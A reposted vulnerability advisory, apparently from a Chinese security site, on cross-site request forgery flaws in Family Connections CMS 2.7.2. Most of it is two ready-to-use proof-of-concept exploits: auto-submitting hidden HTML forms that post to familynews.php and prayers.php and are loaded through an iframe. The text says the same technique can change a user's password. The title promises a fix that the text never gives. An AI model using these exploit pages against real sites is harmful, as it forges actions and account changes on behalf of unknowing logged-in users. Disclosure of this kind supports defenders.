FCMS_2.7.2 cms and earlier多个CSRF缺陷及修复 - 网站安

下载 地址:http://sourceforge.net/projects/fam-connections/files/Family%20Connections/2.7.2/FCMS_2.7.2.zip/download 

作者: Ahmed Elhady Mohamed 

影响版本: 2.7.2 

测试平台: windows XP Sp2 En 

 

概述  

 

# This vulnerability allows a malicious hacker to change password of a user 

 

and also it allows changing the website information. 

 

=================================================================================== 

 

  

 

#First we must install all optional sections during installation process. 

 

        

 

#there are csrf in all sections in this application for examples you can add news , pray for ,  

 

change the password and can do all functionalities are there. 

 

      

 

#here are some examples for prove of concept 

 

      

 

  

exploit code for Page "familynews.php"

 

 

    #Save the following codr in a file called "code. html " 

 

  

 

        <html> 

 

            <head> 

 

                <script type="text/javascript"> 

 

                    function autosubmit() { 

 

                        document.getElementById('ChangeSubmit').submit(); 

 

                    }    

 

                </script> 

 

            </head> 

 

            <body  onLoad="autosubmit()"> 

 

                <form method="POST"  action="http://www.2cto.com /FCMS_2.7.2/FCMS_2.7.2/familynews.php"  id="ChangeSubmit"> 

 

                    <input type="hidden"  name="title"  value="test" /> 

 

                    <input type="hidden"  name="submitadd"  value="Add" /> 

 

                    <input type="hidden"  name="post"  value="testcsrf" /> 

 

                    <input type="submit" value="submit"/> 

 

                </form> 

 

            </body> 

 

        </html> 

 

  

 

  

 

      

 

    #then i called "code.html" from another page  

 

  

 

    <html> 

 

        <body> 

 

            <iframe  src="code.html" onLoad=""></iframe> 

 

        </body> 

 

    </html> 

 

  

 

  

 

exploit code for Page "prayers.php"

      

 

    #Save the following code in a file called "code.html" 

 

    <html> 

 

        <head> 

 

            <script type="text/javascript"> 

 

                function autosubmit() {  

 

                    document.getElementById('ChangeSubmit').submit(); 

 

                }    

 

            </script> 

 

        </head> 

 

        <body  onLoad="autosubmit()"> 

 

            <form method="POST"  action="http://www.2cto.com /FCMS_2.7.2/FCMS_2.7.2/prayers.php" id="ChangeSubmit"> 

 

                <input type="hidden"  name="for"  value="test" /> 

 

                <input type="hidden"  name="submitadd"  value="Add" /> 

 

                <input type="hidden"  name="desc"  value="testtest" /> 

 

                <input type="submit" value="submit"/> 

 

            </form> 

 

          

 

        </body> 

 

    </html> 

 

      

 

    #then i called "code.html" from another page  

 

  

 

    <html> 

 

        <body> 

 

            <iframe  src="code.html" onLoad=""></iframe> 

 

        </body> 

 

    </html> 

 

  

查看更多关于FCMS_2.7.2 cms and earlier多个CSRF缺陷及修复 - 网站安的详细内容...